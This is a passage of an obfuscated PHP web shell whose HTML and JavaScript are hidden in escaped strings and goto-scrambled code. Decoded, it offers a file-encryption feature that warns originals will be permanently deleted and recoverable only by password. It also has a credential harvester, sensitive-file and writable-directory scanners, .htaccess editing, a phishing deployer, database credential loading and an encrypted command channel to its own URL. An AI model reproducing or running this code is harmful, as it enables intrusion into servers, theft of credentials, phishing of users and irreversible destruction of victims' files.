22\x3e\126\145\162\151\x66\171\40\46\x20\x43\157\156\164\151\x6e\165\x65\74\57\x62\165\164\x74\157\x6e\x3e\74\57\144\x69\x76\76\x3c\x2f\x64\x69\166\76\74\57\x64\x69\x76\76\x3c\57\144\151\x76\76\12\x9\74\x64\151\166\40\151\x64\75\x22\x69\162\162\x65\166\x65\x72\x73\x69\x62\x6c\x65\55\x6d\x6f\x64\141\154\x22\40\143\x6c\141\163\163\x3d\x22\155\x6f\144\141\154\42\76\x3c\144\151\x76\x20\143\154\141\163\x73\75\42\x6d\x6f\x64\141\x6c\x2d\143\x6f\x6e\x74\145\x6e\164\40\x69\x72\162\145\x76\x65\x72\163\x69\142\154\x65\55\x6d\x6f\x64\x61\154\x2d\x63\157\x6e\x74\145\x6e\x74\x22\76\x3c\x64\x69\166\x20\143\154\x61\x73\x73\x3d\42\155\157\x64\x61\x6c\55\150\145\x61\x64\x65\162\40\x69\x72\162\145\x76\x65\x72\x73\x69\142\x6c\x65\55\x6d\157\144\x61\154\x2d\150\x65\x61\144\x65\x72\42\x3e\74\x68\x33\76\xe2\x9a\240\357\270\x8f\40\x44\x41\116\x47\105\122\x3a\x20\111\122\122\105\x56\x45\x52\123\111\x42\114\x45\x20\101\x43\124\111\x4f\116\74\x2f\x68\63\76\x3c\x73\x70\x61\x6e\40\143\154\141\x73\163\x3d\x22\143\154\157\163\145\x22\40\x69\144\75\42\151\x72\162\145\x76\145\x72\x73\x69\x62\x6c\145\55\x6d\x6f\144\x61\154\55\x63\154\x6f\x73\145\42\x3e\46\x74\151\x6d\145\163\73\74\57\x73\x70\x61\156\x3e\x3c\57\x64\x69\x76\x3e\74\144\x69\166\40\143\x6c\141\163\x73\x3d\42\x6d\157\x64\x61\x6c\x2d\142\x6f\x64\x79\x20\151\162\x72\145\x76\x65\x72\x73\x69\142\154\x65\55\x6d\157\144\141\x6c\55\x62\157\144\x79\42\x3e\x3c\144\x69\166\40\143\154\141\x73\163\x3d\x22\151\162\162\x65\x76\x65\x72\x73\151\x62\154\145\x2d\x77\x61\x72\x6e\151\156\147\55\142\157\x78\42\x3e\x3c\144\151\x76\x20\143\x6c\141\163\163\75\x22\x69\x72\162\145\166\x65\x72\163\151\x62\154\x65\55\151\143\157\156\42\76\xf0\237\x92\200\x3c\57\x64\151\x76\76\x3c\x64\151\x76\x20\143\x6c\141\163\163\75\x22\151\x72\x72\145\166\145\162\163\151\142\154\145\55\164\151\x74\x6c\x65\42\76\x54\x48\111\x53\40\101\103\x54\x49\x4f\116\40\x49\123\40\111\122\122\105\x56\105\122\x53\x49\x42\114\x45\41\x3c\57\x64\151\166\x3e\74\x64\x69\x76\x20\143\x6c\x61\163\163\x3d\42\151\x72\x72\145\166\x65\162\163\151\142\x6c\145\55\x6d\145\x73\x73\x61\147\145\42\40\151\x64\x3d\42\x69\x72\162\145\166\145\x72\163\x69\x62\154\x65\x2d\x6d\145\x73\163\x61\x67\x65\42\x3e\x3c\57\x64\x69\166\76\74\x64\151\x76\x20\143\154\141\x73\x73\75\x22\x69\x72\x72\145\x76\145\162\163\151\142\154\x65\x2d\x64\145\x74\x61\151\154\x73\x22\76\x3c\144\x69\166\40\x63\154\141\x73\x73\x3d\42\151\x72\x72\145\x76\145\x72\163\x69\142\154\x65\x2d\144\x65\164\141\x69\x6c\55\151\x74\x65\155\42\76\x3c\163\x70\141\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\x64\145\x74\x61\151\154\55\x69\143\x6f\156\x22\76\360\x9f\224\x92\x3c\57\163\x70\141\156\76\x3c\x73\160\141\x6e\40\143\154\x61\x73\x73\75\42\x64\145\164\141\x69\x6c\x2d\164\145\170\164\42\x3e\x46\151\x6c\145\163\x20\x77\x69\x6c\154\x20\x62\145\40\x65\156\143\162\x79\160\x74\x65\x64\40\167\x69\164\150\40\110\x41\x44\105\123\x20\145\x6e\x63\x72\x79\x70\x74\151\157\156\74\x2f\163\160\141\x6e\76\74\x2f\x64\151\x76\x3e\74\x64\151\x76\x20\143\x6c\x61\x73\x73\75\42\x69\x72\x72\x65\x76\145\x72\x73\x69\142\154\145\x2d\144\145\x74\141\151\x6c\x2d\x69\164\145\x6d\x22\76\74\163\160\141\156\x20\x63\x6c\141\x73\x73\75\x22\144\x65\164\x61\151\154\x2d\151\x63\x6f\156\42\76\xf0\x9f\227\221\xef\xb8\x8f\74\x2f\x73\160\141\156\76\74\163\160\141\156\x20\143\154\141\163\163\75\42\x64\x65\164\x61\151\154\55\164\145\170\164\42\x3e\117\x72\x69\x67\151\156\141\x6c\40\x66\151\154\x65\x73\40\167\x69\x6c\154\x20\x62\x65\x20\120\105\122\x4d\101\116\105\x4e\124\114\131\40\104\105\x4c\x45\124\x45\x44\x3c\x2f\163\160\x61\156\76\74\57\144\151\x76\x3e\74\144\151\x76\40\143\x6c\x61\163\x73\x3d\x22\151\x72\162\x65\x76\x65\x72\x73\x69\x62\154\145\x2d\x64\145\x74\141\151\154\55\x69\164\x65\155\x22\x3e\74\163\x70\141\156\40\x63\x6c\x61\163\163\75\x22\144\145\164\141\x69\154\55\151\143\157\x6e\42\76\360\237\224\221\x3c\57\x73\x70\x61\x6e\76\x3c\x73\160\141\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\x64\145\x74\141\151\x6c\55\x74\x65\170\164\42\x3e\122\x65\143\x6f\166\x65\x72\x79\40\151\x73\40\117\x4e\x4c\131\x20\x70\157\163\x73\x69\x62\154\x65\x20\167\x69\164\150\x20\164\x68\145\x20\160\141\x73\x73\167\157\x72\x64\x3c\x2f\163\x70\x61\156\76\x3c\x2f\144\x69\x76\x3e\74\144\151\x76\40\x63\x6c\141\163\x73\x3d\x22\x69\x72\x72\x65\166\145\x72\x73\151\142\154\x65\55\144\x65\x74\x61\x69\154\55\151\164\x65\155\42\x3e\74\x73\x70\141\x6e\x20\143\x6c\x61\163\163\75\42\144\x65\x74\x61\151\x6c\x2d\x69\x63\157\156\x22\x3e\xe2\x9a\xa0\357\xb8\217\74\57\x73\x70\141\x6e\x3e\74\163\x70\141\156\x20\x63\154\141\x73\x73\75\x22\144\145\x74\141\151\x6c\55\164\x65\170\164\42\x3e\x57\151\x74\150\x6f\x75\164\x20\x74\150\145\40\160\x61\x73\x73\x77\157\162\x64\x2c\40\146\x69\x6c\x65\x73\40\x61\162\x65\x20\114\x4f\x53\x54\40\x46\x4f\x52\x45\126\105\122\x3c\x2f\163\x70\141\156\x3e\74\x2f\x64\x69\x76\x3e\x3c\57\x64\x69\166\x3e\74\57\x64\151\x76\x3e\x3c\144\151\x76\40\x63\x6c\141\163\x73\x3d\42\151\162\x72\145\166\145\x72\x73\151\142\154\x65\55\x6d\x6f\144\x61\154\x2d\x61\143\x74\151\157\x6e\163\x22\76\x3c\x62\x75\164\164\157\156\40\151\144\75\x22\x69\162\162\145\166\145\x72\163\151\x62\154\x65\55\143\x61\x6e\143\145\154\x2d\x62\164\x6e\x22\x20\x63\154\x61\x73\163\75\42\151\x72\162\x65\x76\x65\x72\x73\151\142\154\145\x2d\x62\x74\156\x2d\143\x61\156\143\x65\154\42\x3e\342\x9d\x8c\x20\103\x61\x6e\x63\145\x6c\74\57\x62\x75\164\164\157\156\x3e\74\x62\165\164\x74\157\156\40\x69\x64\75\42\151\x72\x72\x65\x76\x65\x72\x73\x69\x62\154\x65\55\x63\157\156\146\x69\162\x6d\55\x62\164\156\x22\40\x63\154\x61\x73\x73\x3d\42\151\162\162\x65\166\x65\162\x73\151\x62\154\x65\x2d\x62\x74\156\55\143\x6f\156\x66\151\162\x6d\x22\76\360\x9f\222\200\x20\x49\x20\x55\x4e\x44\x45\122\x53\124\101\116\x44\40\x2d\x20\120\122\117\103\x45\x45\104\x3c\x2f\142\165\164\164\157\x6e\76\74\x2f\144\151\x76\76\x3c\57\x64\151\166\x3e\x3c\x2f\144\x69\166\76\x3c\57\x64\x69\166\76\12\11\x3c\x64\151\166\x20\151\144\75\42\x63\x6f\x6e\146\x69\x72\155\55\155\x6f\144\141\154\x22\40\x63\154\x61\163\x73\75\42\x6d\157\x64\141\x6c\x22\x3e\12\11\11\x3c\144\x69\166\40\x63\x6c\x61\x73\163\x3d\42\x6d\x6f\x64\x61\154\x2d\143\157\156\164\x65\x6e\164\x20\x63\157\x6e\x66\x69\162\x6d\x2d\155\157\x64\141\x6c\55\143\x6f\156\x74\145\x6e\164\x22\76\xa\11\x9\x9\x3c\x64\x69\166\40\143\x6c\141\x73\x73\75\x22\155\157\x64\x61\154\x2d\150\145\141\x64\145\162\40\143\157\156\146\151\x72\x6d\55\x6d\x6f\144\x61\154\55\x68\x65\x61\144\145\162\42\76\xa\11\11\x9\11\74\150\63\x20\151\144\75\x22\x63\157\156\x66\x69\x72\155\55\x74\151\164\x6c\x65\x22\x3e\342\232\xa0\357\270\x8f\x20\103\x6f\156\x66\151\162\155\x61\164\x69\157\156\x3c\x2f\x68\63\76\xa\x9\11\11\x9\74\163\160\x61\x6e\40\143\x6c\141\163\163\x3d\42\x63\x6c\157\163\145\42\x20\151\x64\x3d\42\x63\x6f\x6e\146\x69\x72\x6d\55\x6d\x6f\x64\141\x6c\55\x63\x6c\157\163\x65\42\x3e\x26\164\x69\x6d\145\163\73\x3c\57\x73\x70\141\156\76\12\x9\x9\x9\x3c\57\x64\x69\166\x3e\12\x9\x9\x9\74\144\x69\166\x20\x63\x6c\141\x73\163\75\x22\155\x6f\144\141\x6c\55\142\x6f\144\171\40\x63\157\156\146\151\x72\x6d\x2d\x6d\157\x64\x61\x6c\x2d\x62\157\x64\x79\x22\76\xa\11\11\11\11\74\144\151\x76\40\143\x6c\x61\163\x73\x3d\x22\143\157\x6e\x66\151\162\x6d\55\x69\143\157\x6e\x22\40\151\144\75\42\143\x6f\156\146\151\162\x6d\x2d\151\x63\157\x6e\42\76\342\232\240\xef\xb8\217\x3c\x2f\144\151\x76\76\xa\x9\x9\11\11\x3c\x64\151\166\x20\x63\x6c\141\163\163\x3d\42\x63\157\x6e\x66\x69\x72\155\x2d\x6d\x65\163\163\141\147\145\42\40\x69\x64\x3d\x22\x63\x6f\x6e\x66\151\x72\155\x2d\x6d\145\163\x73\141\x67\x65\42\76\74\57\x64\151\x76\76\xa\x9\x9\x9\11\74\144\x69\x76\40\143\x6c\141\163\x73\x3d\42\x63\x6f\x6e\146\151\162\x6d\x2d\x6d\157\x64\141\154\x2d\x61\143\164\x69\x6f\156\163\x22\76\xa\11\11\x9\x9\x9\74\142\x75\164\164\x6f\156\x20\151\144\x3d\x22\143\157\156\146\x69\162\x6d\x2d\x63\x61\156\x63\145\154\x2d\x62\164\x6e\x22\x20\143\x6c\x61\x73\163\x3d\42\x63\x6f\x6e\146\x69\x72\x6d\x2d\142\164\x6e\x2d\143\x61\156\143\145\x6c\42\76\x43\141\x6e\x63\145\154\74\x2f\x62\x75\x74\x74\157\156\x3e\12\x9\11\x9\11\x9\x3c\142\x75\164\164\157\x6e\40\151\144\75\42\143\157\156\146\151\x72\x6d\x2d\x6f\153\55\142\x74\x6e\42\x20\x63\154\x61\163\x73\75\42\143\x6f\x6e\x66\151\x72\x6d\x2d\x62\164\156\55\x6f\x6b\x22\x3e\x4f\x4b\x3c\x2f\142\x75\164\164\157\x6e\76\xa\11\11\11\x9\x3c\57\144\151\x76\76\xa\11\11\x9\x3c\x2f\144\151\166\x3e\xa\11\x9\x3c\x2f\x64\151\x76\x3e\xa\x9\74\x2f\x64\x69\166\76\12\x9\74\144\151\x76\x20\x69\x64\75\x22\x69\x6e\160\165\164\55\155\x6f\x64\x61\154\x22\x20\143\154\x61\163\x73\75\42\x6d\157\144\141\x6c\x22\x3e\12\11\11\x3c\144\x69\x76\40\x63\154\141\163\163\x3d\x22\155\x6f\x64\141\x6c\55\x63\x6f\156\x74\x65\x6e\164\x20\x69\156\x70\x75\x74\x2d\155\157\x64\141\154\55\x63\157\156\x74\x65\156\164\x22\x3e\12\x9\x9\x9\74\x64\151\x76\x20\x63\154\141\x73\x73\75\42\155\x6f\144\x61\x6c\x2d\150\x65\141\x64\x65\x72\40\x69\156\160\x75\164\55\155\x6f\x64\141\x6c\x2d\x68\x65\x61\x64\x65\162\x22\x3e\12\11\x9\x9\11\74\150\63\40\x69\144\75\42\x69\x6e\160\165\164\x2d\164\x69\164\x6c\145\42\76\xf0\237\223\235\40\x49\156\160\165\x74\40\x52\x65\161\165\151\162\145\144\x3c\57\150\63\x3e\xa\x9\11\x9\x9\x3c\163\160\141\x6e\x20\143\154\141\163\163\x3d\42\143\x6c\x6f\x73\145\x22\x20\151\144\x3d\42\151\x6e\160\165\x74\55\155\x6f\x64\141\154\x2d\143\x6c\x6f\163\145\42\76\46\x74\151\x6d\145\x73\73\x3c\57\163\x70\x61\x6e\x3e\xa\x9\11\x9\x3c\x2f\144\151\x76\76\12\11\x9\x9\74\x64\151\166\40\143\x6c\141\163\x73\75\x22\155\157\x64\141\154\55\x62\x6f\144\x79\40\x69\156\x70\165\x74\x2d\155\157\x64\x61\x6c\x2d\142\x6f\144\171\x22\76\xa\11\x9\x9\x9\74\x64\x69\166\x20\x63\x6c\x61\163\163\75\42\x69\156\160\x75\164\x2d\151\143\x6f\156\42\40\151\x64\75\x22\151\x6e\160\165\164\55\151\143\157\x6e\42\76\360\237\x93\235\x3c\57\144\151\x76\76\xa\x9\x9\x9\x9\x3c\x64\151\166\40\143\154\x61\x73\x73\75\42\x69\x6e\x70\165\x74\x2d\154\141\142\x65\x6c\x22\x20\151\144\75\42\x69\x6e\160\x75\x74\x2d\154\141\142\x65\x6c\42\76\105\x6e\x74\x65\x72\x20\x76\x61\154\x75\145\72\74\x2f\x64\x69\166\x3e\12\11\x9\11\11\x3c\151\x6e\x70\165\x74\x20\164\171\x70\x65\x3d\x22\164\x65\x78\164\42\x20\x69\x64\x3d\x22\x69\x6e\x70\165\164\x2d\x66\x69\x65\x6c\144\x22\40\x63\154\x61\x73\x73\x3d\x22\x69\x6e\x70\x75\164\55\x66\151\x65\154\x64\42\40\160\x6c\141\x63\x65\150\x6f\154\144\145\x72\x3d\x22\x54\171\160\x65\x20\x68\x65\x72\x65\56\56\56\x22\x20\x61\x75\164\157\143\x6f\155\160\x6c\x65\164\x65\75\x22\x6f\146\x66\42\40\x61\165\x74\157\x66\x6f\x63\x75\x73\76\xa\11\11\x9\x9\74\144\151\166\x20\x63\x6c\141\x73\163\75\x22\151\156\x70\165\x74\x2d\x65\162\162\x6f\x72\x22\40\151\144\75\x22\151\x6e\x70\165\x74\55\x65\162\162\x6f\x72\42\76\74\x2f\144\151\x76\76\xa\x9\11\11\x9\74\144\151\x76\x20\x63\154\x61\x73\x73\x3d\x22\x69\x6e\160\x75\x74\x2d\155\x6f\144\141\154\x2d\x61\x63\x74\x69\157\x6e\163\x22\76\xa\11\x9\11\11\x9\74\x62\165\164\164\157\156\40\x69\144\75\42\x69\x6e\x70\165\x74\55\x63\141\156\x63\145\154\55\142\x74\156\x22\40\143\154\x61\x73\163\75\x22\x69\x6e\x70\165\164\x2d\x62\164\x6e\x2d\143\141\156\143\145\154\42\x3e\x43\x61\x6e\x63\x65\154\x3c\57\x62\x75\164\x74\x6f\156\76\12\11\x9\x9\x9\x9\x3c\x62\165\x74\x74\157\156\40\x69\144\x3d\42\x69\156\x70\x75\x74\x2d\x6f\x6b\55\x62\164\x6e\42\40\x63\x6c\x61\x73\163\x3d\42\151\x6e\160\165\164\x2d\x62\164\x6e\x2d\157\x6b\42\76\x4f\x4b\x3c\x2f\142\x75\x74\x74\157\156\76\xa\11\x9\11\x9\74\x2f\x64\151\x76\76\12\x9\x9\11\x3c\x2f\144\151\166\x3e\xa\11\11\x3c\57\x64\151\x76\76\12\11\x3c\57\144\x69\x76\x3e\12\11\74\144\151\x76\x20\x69\x64\x3d\42\x74\x6f\x61\x73\x74\42\76\x3c\57\144\151\x76\x3e\12\xa\x20\x9\x3c\x73\143\162\x69\x70\x74\x20\163\162\x63\x3d\42\150\164\164\x70\x73\x3a\x2f\x2f\143\144\156\152\x73\x2e\143\154\x6f\x75\144\146\x6c\141\x72\145\x2e\143\x6f\155\x2f\141\152\141\x78\57\x6c\x69\142\x73\57\x63\157\x64\x65\155\x69\162\162\157\162\57\x35\56\x36\x35\x2e\x31\65\x2f\x63\157\144\x65\155\x69\162\x72\x6f\162\x2e\155\x69\x6e\56\152\163\42\x3e\x3c\57\x73\143\x72\x69\160\x74\76\12\x20\x9\x3c\163\143\162\151\160\x74\x20\x73\x72\x63\x3d\42\150\164\x74\x70\163\72\x2f\x2f\x63\144\x6e\x6a\163\x2e\143\x6c\x6f\165\144\146\x6c\141\x72\145\56\143\157\155\x2f\141\x6a\141\170\x2f\x6c\x69\142\x73\57\x63\157\x64\145\155\x69\162\x72\x6f\162\x2f\x35\x2e\66\x35\x2e\x31\65\x2f\x6d\x6f\144\145\57\x6d\145\x74\x61\56\152\163\42\76\x3c\x2f\163\143\x72\151\160\164\x3e\xa\x20\x9\74\163\x63\162\151\x70\x74\40\163\162\143\75\x22\150\164\164\x70\163\x3a\x2f\x2f\143\x64\156\152\x73\56\143\x6c\x6f\x75\144\146\154\x61\162\x65\56\x63\157\x6d\57\x61\152\141\170\x2f\x6c\x69\142\x73\x2f\143\157\x64\x65\x6d\x69\x72\162\x6f\162\x2f\x35\56\x36\65\56\61\x35\57\141\144\144\157\x6e\57\x65\144\151\164\x2f\x6d\141\164\143\x68\142\x72\x61\x63\153\145\164\x73\56\x6d\151\156\56\152\x73\42\x3e\74\57\163\143\x72\151\x70\164\x3e\12\x20\11\74\163\x63\x72\151\x70\164\76\12\40\x9\x63\157\x6e\163\x74\x20\123\x43\x52\x49\120\x54\137\125\122\114\40\x3d\x20\47"; goto WG9CP; jlE2p: function CUa0x() { goto c2rTk; rodCd: if (!($kxVgv === false || $teWYf === false)) { goto tgeSl; } goto aaUCa; sJxQH: $teWYf = @disk_free_space($j3_hR); goto rodCd; c2rTk: $j3_hR = "\57"; goto FRQUC; QLgrr: return ["\x74\157\x74\141\x6c" => $kxVgv, "\x75\163\x65\x64" => $kxVgv - $teWYf]; goto qvRXa; zbDNU: tgeSl: goto QLgrr; aaUCa: return ["\x74\157\x74\141\x6c" => 0, "\x75\163\145\144" => 0]; goto zbDNU; FRQUC: $kxVgv = @disk_total_space($j3_hR); goto sJxQH; qvRXa: } goto lw9o7; eVoXz: $LuJuN = dirname($zJsLG) . DIRECTORY_SEPARATOR . "\x2e\x6a\x61\156\165\163\137\142\x61\143\x6b\x75\160\x5f" . substr(md5($zJsLG), 0, 12) . "\x2e\160\150\160"; goto SLKdB; ypaDn: flush(); goto lhvck; hbdEQ: if (!(json_last_error() === JSON_ERROR_NONE)) { goto XBHMN; } goto ndKJC; WPEdu: echo "\47\x3b\12\12\x20\x9\143\x6f\x6e\163\x74\x20\x41\x70\160\x20\75\40\x7b\12\40\x9\11\143\x77\144\72\40\x27\x27\54\40\163\x68\145\x6c\x6c\x5f\x64\151\162\72\x20\47\47\x2c\x20\x68\151\163\164\x6f\x72\x79\72\x20\x5b\x5d\x2c\40\x68\151\x73\164\157\162\x79\x49\x6e\144\145\x78\72\x20\x2d\61\x2c\x20\x65\x64\151\164\x6f\x72\72\x20\156\165\x6c\x6c\x2c\x20\x73\x74\x61\x74\x73\x49\x6e\164\145\162\166\x61\x6c\72\40\x6e\165\x6c\154\54\xa\x20\11\x9\x75\163\x65\162\72\40\x27\47\x2c\x20\x68\x6f\163\164\x6e\x61\x6d\145\x3a\40\47\47\54\40\x6b\145\x72\x6e\145\154\111\156\146\x6f\x3a\x20\173\175\54\x20\151\156\164\x65\x6c\106\x65\164\143\x68\x65\x64\x3a\40\146\x61\x6c\x73\x65\54\12\x20\11\x9\x61\x73\x79\156\143\40\x69\156\151\x74\x28\x29\40\x7b\12\x9\11\11\x74\x72\171\x20\x7b\12\x20\x9\x9\x9\x63\157\156\163\164\x20\143\x6f\x6e\164\145\170\x74\40\75\x20\x61\x77\141\x69\164\x20\x74\150\151\163\x2e\141\x70\151\50\47\147\x65\x74\137\143\x6f\156\x74\x65\170\x74\47\x29\x3b\xa\40\11\x9\11\x69\146\40\50\x63\157\x6e\164\x65\x78\x74\x20\46\46\40\x63\157\x6e\164\145\170\x74\56\163\164\141\x74\165\x73\40\x3d\x3d\x3d\x20\47\x73\165\x63\143\x65\163\163\47\51\x20\173\xa\x9\11\x9\x9\11\x74\x68\x69\x73\x2e\143\167\144\x20\x3d\40\143\157\156\164\x65\x78\x74\56\143\x77\144\73\40\12\x9\11\11\x9\x9\x74\150\x69\163\x2e\163\x68\x65\x6c\154\137\x64\151\162\40\75\40\143\157\x6e\x74\x65\170\x74\56\163\150\145\x6c\154\137\x64\x69\x72\73\12\x9\11\x9\11\11\x74\x68\151\163\x2e\165\x73\x65\162\40\x3d\x20\143\157\x6e\164\145\170\164\x2e\165\163\x65\x72\x3b\x20\xa\11\x9\x9\x9\11\164\x68\151\163\56\150\157\x73\x74\x6e\141\x6d\x65\x20\x3d\40\x63\x6f\156\164\145\x78\164\56\x68\157\163\164\x6e\141\155\x65\73\xa\x9\x9\x9\11\x9\x74\150\x69\x73\56\x72\145\156\144\145\162\123\171\x73\x49\156\x66\x6f\x28\143\157\156\164\x65\x78\164\56\163\x79\163\151\x6e\x66\x6f\51\73\x20\12\x9\x9\11\x9\x9\x74\150\x69\163\x2e\165\160\144\x61\164\x65\x53\171\163\x74\145\x6d\111\156\x66\157\x48\145\x61\x64\x65\x72\x28\143\157\x6e\164\x65\170\164\x29\x3b\xa\x9\x9\x9\x9\x9\x74\x68\151\x73\56\156\x61\166\151\147\x61\x74\x65\x28\x27\146\x69\x6c\x65\163\47\x29\73\40\12\11\x9\11\11\11\x74\150\151\163\56\x62\x69\x6e\144\x45\166\x65\156\x74\163\x28\x29\x3b\12\x20\11\x9\11\11\164\x68\151\x73\56\154\157\141\144\104\x62\103\162\145\x64\145\x6e\x74\x69\141\x6c\x73\50\51\73\12\x9\11\x9\x9\11\xa\x9\x9\11\11\x9\x2f\57\40\123\145\x74\40\144\x65\x66\x61\x75\154\164\x20\x70\141\x74\x68\x73\40\x73\x61\x66\x65\x6c\x79\12\11\x9\x9\11\x9\x63\157\156\163\164\x20\160\141\x74\x68\x49\x6e\x70\x75\x74\x73\40\x3d\40\133\xa\x9\x9\11\11\11\11\47\x73\x65\x61\162\143\150\x2d\x70\141\x74\150\47\x2c\x20\47\167\x72\151\x74\141\x62\x6c\145\x2d\x73\x63\x61\x6e\x2d\160\141\x74\x68\x27\x2c\40\47\143\x6f\x6e\x74\x65\x6e\164\x2d\x73\145\141\162\x63\x68\55\160\x61\x74\x68\47\x2c\xa\11\11\11\11\x9\x9\47\150\x74\141\x63\143\145\x73\x73\55\x70\x61\164\150\47\54\x20\47\x63\x72\145\x64\55\x68\x61\x72\x76\145\163\164\145\162\x2d\160\x61\x74\150\x27\54\40\47\163\x65\x6e\x73\x69\x74\151\166\145\55\163\143\x61\156\55\160\x61\x74\150\x27\54\xa\11\x9\11\x9\x9\x9\47\x6d\x6f\x6e\151\164\x6f\162\x2d\160\x61\164\150\x27\54\40\47\160\x68\151\x73\x68\55\144\145\x70\x6c\x6f\171\x2d\x70\x61\164\x68\x27\12\11\11\11\11\11\135\73\12\x9\11\11\x9\11\x70\141\x74\x68\111\x6e\x70\x75\164\163\56\146\157\162\105\x61\143\150\50\x69\x64\x20\75\x3e\x20\x7b\12\11\x9\x9\x9\x9\x9\143\x6f\x6e\x73\164\40\x65\x6c\x20\75\40\x64\157\x63\165\x6d\145\x6e\x74\x2e\147\145\x74\105\154\145\155\x65\x6e\x74\102\x79\111\144\x28\151\x64\51\73\xa\x9\x9\x9\x9\11\11\x69\x66\40\50\x65\154\x29\x20\x65\x6c\x2e\166\141\x6c\165\145\40\75\x20\164\150\151\163\x2e\x63\x77\x64\73\12\x9\11\x9\11\11\175\x29\x3b\12\11\x9\x9\11\11\12\x9\11\11\x9\x9\143\x6f\x6e\x73\x74\x20\151\156\x74\x65\x6c\x48\x6f\163\164\x45\x6c\40\75\40\144\157\x63\165\x6d\x65\x6e\x74\x2e\147\145\x74\x45\154\145\x6d\145\156\x74\x42\171\111\x64\50\47\x69\156\x74\x65\154\55\150\x6f\163\164\55\x6e\x61\x6d\x65\x27\51\x3b\12\11\x9\11\x9\11\151\x66\40\x28\151\156\164\145\x6c\110\157\x73\164\x45\x6c\51\40\x69\x6e\164\145\x6c\110\157\163\x74\105\x6c\56\x69\x6e\156\145\x72\124\145\170\x74\x20\75\40\164\x68\x69\x73\56\150\x6f\x73\x74\x6e\141\155\145\73\12\11\11\x9\11\175\40\145\154\x73\x65\x20\x7b\40\12\11\x9\x9\x9\11\143\x6f\156\163\164\40\145\x72\162\x6f\x72\115\x73\147\x20\75\x20\x63\157\x6e\164\145\x78\164\x20\x3f\40\x28\x63\157\x6e\164\145\x78\x74\x2e\155\145\163\163\x61\147\145\x20\174\x7c\40\x27\106\141\151\x6c\x65\144\40\164\x6f\40\x69\156\x69\164\x69\x61\154\151\x7a\x65\40\163\150\x65\154\x6c\56\x27\x29\40\x3a\x20\47\x45\x6d\160\164\x79\40\162\x65\163\160\x6f\x6e\163\145\40\146\162\157\155\x20\x73\145\162\166\145\162\56\47\73\xa\11\x9\11\x9\11\164\x68\x69\x73\x2e\164\157\141\x73\164\x28\x65\x72\162\x6f\x72\x4d\x73\147\x2c\x20\x27\x65\x72\162\157\162\47\x29\x3b\12\x9\x9\11\11\11\x63\157\x6e\x73\157\154\x65\56\145\162\x72\157\x72\x28\47\x49\x6e\151\164\x20\146\141\151\x6c\145\x64\72\x27\54\40\x63\x6f\156\164\x65\170\x74\x29\x3b\xa\11\x9\11\x9\175\12\11\11\x9\175\x20\x63\141\164\143\150\40\x28\145\51\x20\173\xa\x9\x9\x9\x9\143\157\x6e\x73\x6f\x6c\145\x2e\145\162\x72\157\162\x28\47\111\x6e\x69\x74\40\x65\x72\x72\x6f\x72\x3a\x27\x2c\40\145\x29\x3b\12\x9\11\x9\11\164\x68\151\x73\56\164\x6f\x61\x73\x74\50\x27\106\141\151\154\x65\144\x20\164\157\40\x69\x6e\151\x74\x69\141\154\x69\x7a\145\x2e\40\x43\x68\145\x63\x6b\40\x63\x6f\x6e\163\157\x6c\x65\40\146\x6f\x72\40\x64\x65\x74\141\151\154\x73\x2e\x27\54\x20\47\145\x72\x72\157\x72\x27\51\73\12\11\x9\x9\175\xa\x20\11\11\175\x2c\xa\x9\x9\x61\163\171\x6e\x63\40\141\160\x69\x28\x61\143\164\151\x6f\x6e\x2c\40\x64\x61\164\x61\40\x3d\x20\x7b\x7d\x29\x20\x7b\12\x9\x9\x9\x63\x6f\x6e\x73\164\40\x70\x61\x79\x6c\x6f\141\x64\x20\x3d\x20\x7b\x20\x61\143\164\x69\157\156\54\40\x2e\56\x2e\x64\x61\164\141\x20\x7d\73\xa\11\x9\11\x63\157\x6e\x73\164\x20\x65\156\x63\157\x64\145\144\x50\141\x79\x6c\x6f\x61\x64\40\x3d\40\164\150\151\163\56\x65\156\x63\x72\171\160\x74\50\112\123\117\116\x2e\163\x74\162\x69\156\147\151\x66\171\50\x70\x61\x79\154\157\141\144\x29\51\x3b\xa\11\x9\x9\x63\x6f\x6e\163\x74\x20\146\157\162\x6d\104\141\x74\x61\40\75\40\156\145\x77\x20\106\x6f\162\x6d\104\141\x74\x61\50\51\73\xa\11\x9\11\146\x6f\162\x6d\x44\141\x74\x61\x2e\141\x70\160\145\156\144\50\x27\160\47\54\x20\x65\x6e\143\157\144\x65\x64\120\141\x79\154\157\141\144\51\x3b\12\x9\x9\x9\164\x72\171\40\173\xa\x9\11\11\x9\x63\x6f\x6e\x73\164\40\x72\x65\163\40\x3d\40\x61\167\141\x69\164\40\x66\145\x74\143\150\x28\123\103\x52\x49\120\124\x5f\x55\x52\x4c\54\40\173\40\155\145\x74\150\x6f\144\x3a\40\x27\x50\117\x53\124\47\x2c\40\x62\x6f\144\171\x3a\40\x66\157\x72\155\x44\x61\x74\141\x20\x7d\51\x3b\xa\11\11\x9\11\x69\146\40\x28\x21\x72\145\163\56\x6f\153\51\40\164\150\162\157\167\40\156\145\x77\x20\105\162\x72\157\162\50\140\110\124\124\120\x20\145\x72\162\157\162\41\40\163\164\141\x74\165\163\72\40\44\x7b\x72\x65\163\56\x73\164\x61\164\x75\163\x7d\x60\x29\x3b\12\11\11\11\11\143\157\x6e\x73\164\x20\x65\x6e\143\x6f\144\x65\144\122\145\163\x70\157\x6e\163\x65\x20\75\x20\141\x77\141\x69\x74\x20\162\145\163\56\164\x65\x78\x74\50\51\x3b\xa\11\11\11\x9\151\146\x20\x28\x21\145\156\143\x6f\144\x65\144\122\x65\163\x70\157\156\163\145\x29\40\173\x20\xa\11\x9\x9\x9\11\x63\x6f\156\x73\157\x6c\x65\56\x65\x72\162\157\162\50\47\x41\x50\111\40\x72\145\x73\x70\x6f\156\x73\145\x20\151\163\40\x65\155\x70\x74\x79\x2e\47\51\73\x20\12\11\x9\11\x9\11\162\x65\x74\165\x72\x6e\40\173\40\x73\x74\x61\164\x75\163\72\40\x27\x65\162\x72\x6f\x72\47\54\x20\x6d\145\x73\163\x61\x67\x65\x3a\40\x27\x45\x6d\x70\164\171\x20\162\145\163\160\157\x6e\x73\x65\x20\x66\x72\x6f\155\40\163\x65\x72\166\145\162\56\x27\40\175\73\40\xa\11\x9\x9\x9\x7d\xa\x9\11\x9\x9\143\157\156\x73\x74\40\x64\x65\143\x72\x79\x70\x74\x65\x64\122\x65\163\x70\157\156\163\145\40\x3d\x20\x74\150\x69\x73\x2e\x64\145\143\x72\x79\160\x74\50\x65\156\x63\x6f\144\145\144\x52\x65\163\x70\157\x6e\163\145\51\73\12\x9\x9